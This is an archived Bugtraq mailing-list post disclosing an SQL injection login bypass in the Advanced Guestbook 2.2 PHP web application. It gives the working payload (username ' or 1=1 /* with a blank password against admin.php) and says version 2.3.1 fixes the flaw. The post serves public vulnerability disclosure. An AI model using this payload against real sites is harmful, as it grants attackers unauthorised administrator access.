[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20051106190312.24566.qmail@securityfocus.com>
Date: 6 Nov 2005 19:03:12 -0000
From: bhs_team@...oo.com
To: bugtraq@...urityfocus.com
Subject: Advanced Guestbook 2.2 ( SQL Injection Exploit )
Guestbook 2.2 webapplication (PHP, MySQL) appears vulnerable to SQL Injection granting the attacker administrator access.
Target :
http://www.example.com/[GuestbookTarget]/admin.php
Username: ' or 1=1 /*
Password: (Nothing)(Blank)
It`s Working On Advanced Guestbook 2.2 version 2.3.1 will fix this vulnerability.
Report By : POPO ( Pooya )
From www.Babol-Hackers.com
bhs_team@...oo.com
Y! ID : bhs_team , pooya_0nline
-----------------------------------
BHS-Team
We Are : POPO + Padeshah + Black ICE + Ezraeil + UNDERTAKER + Fa0p
Powered by blists - more mailing lists